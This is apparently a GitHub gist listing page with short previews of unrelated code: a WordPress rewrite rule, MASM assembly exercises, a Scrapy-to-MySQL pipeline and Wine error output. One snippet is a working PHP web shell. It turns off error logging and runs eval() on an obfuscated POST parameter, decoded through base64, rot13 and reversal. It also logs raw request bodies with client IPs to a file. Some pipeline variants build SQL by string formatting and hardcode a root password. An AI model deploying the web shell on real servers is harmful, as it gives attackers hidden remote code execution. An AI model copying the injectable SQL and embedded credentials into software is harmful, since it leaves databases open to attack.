This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function custom_rewrite_basic() { | |
| global $wp_rewrite; | |
| add_rewrite_rule('^leaf/([0-9]+)/?', 'index.php?page_id=$matches[1]', 'top'); | |
| $wp_rewrite->flush_rules(); | |
| } | |
| add_action('init', 'custom_rewrite_basic'); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| @error_reporting(0); | |
| @ini_set("display_errors",0); | |
| @ini_set("log_errors",0); | |
| @ini_set("error_log",0); | |
| if (isset($_GET['r'])) { print $_GET['r']; } elseif (isset($_POST['e'])) { eval(base64_decode(str_rot13(strrev(base64_decode(str_rot13($_POST['e'])))))); | |
| } elseif (isset($_SERVER['HTTP_CONTENT_ENCODING']) && $_SERVER['HTTP_CONTENT_ENCODING'] == 'binary') | |
| { $data = file_get_contents('php://input'); if (strlen($data) > 0) print 'STATUS-IMPORT-OK'; if (strlen($data) > 12) { $fp=@fopen('tmpfile','a'); | |
| @flock($fp, LOCK_EX); | |
| @fputs($fp, $_SERVER['REMOTE_ADDR']."\t".base64_encode($data)."\r\n"); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| DATAS segment | |
| X DB '12345+67890=$' | |
| y db 6 dup(?) | |
| DATAS ENDS | |
| CODES SEGMENT | |
| ASSUME CS:CODES,DS:DATAS | |
| START: | |
| MOV AX,DATAS |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| class MysqlStordPipeline(object): | |
| def __init__(self): | |
| self.connect=MySQLdb.connect('localhost','root','123654','niaoyundb',charset='utf8', use_unicode=False) | |
| self.cursors=self.connect.cursor() | |
| def process_item(self,item,spider): | |
| try: | |
| #self.cursors.execute("select version()") | |
| sql=''' INSERT INTO `niaoyunTable` (title, href) VALUES ("%s", "%s")'''%(item['title'],item['href']) | |
| self.cursors.execute(sql) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| def process_item(self,item,spider): | |
| try: | |
| #self.cursors.execute("select version()") | |
| self.cursors.execute('''INSERT INTO `niaoyunTable` (title, href) | |
| VALUES (%s, %s)'''%(item['title'],item['href'])) | |
| self.connect.commit() |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| class MysqlStordPipeline(object): | |
| def __int__(self): | |
| self.connect=MySQLdb.connect('localhost','root','123654','niaoyundb',charset='utf8', use_unicode=True) | |
| self.cursors=self.connect.cursor() | |
| def process_item(self,item,spider): | |
| try: | |
| self.cursors.execute("select version()") | |
| except MySQLdb.Error,e: | |
| print "Error %d: %s" % (e.args[0], e.args[1]) | |
| return item |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| class MysqlStordPipeline(object): | |
| def __int__(self): | |
| self.connect=MySQLdb.connect('root','123654','niaoyundb','localhost',charset="utf8", use_unicode=True) | |
| self.cursor=self.connect.cursor() | |
| def process_item(self,item,spider): | |
| try: | |
| self.cursor.execute("""INSERT INTO niaoyunTable (title, href) | |
| VALUES (%s, %s)""", |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| assume cs:code | |
| code segment | |
| mov ax, 2 | |
| mov cx, 9 | |
| s: add ax, ax | |
| loop s | |
| mov ax, 4c00H | |
| int 21H | |
| code ends | |
| end |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| root@li:~# /home/tools/che.exe | |
| fixme:dwmapi:DwmSetWindowAttribute (0x10068, 2, 0x32f504, 4) stub | |
| fixme:font:freetype_GdiRealizationInfo (0x127430, 0x32eec4): stub! | |
| fixme:font:freetype_GdiRealizationInfo (0x127430, 0x32eee0): stub! | |
| fixme:font:freetype_GdiRealizationInfo (0x127430, 0x32eed0): stub! | |
| fixme:font:freetype_GdiRealizationInfo (0x127430, 0x32eee0): stub! | |
| err:ole:CoGetClassObject class {00000535-0000-0010-8000-00aa006d2ea4} not registered | |
| err:ole:CoGetClassObject class {00000535-0000-0010-8000-00aa006d2ea4} not registered |
NewerOlder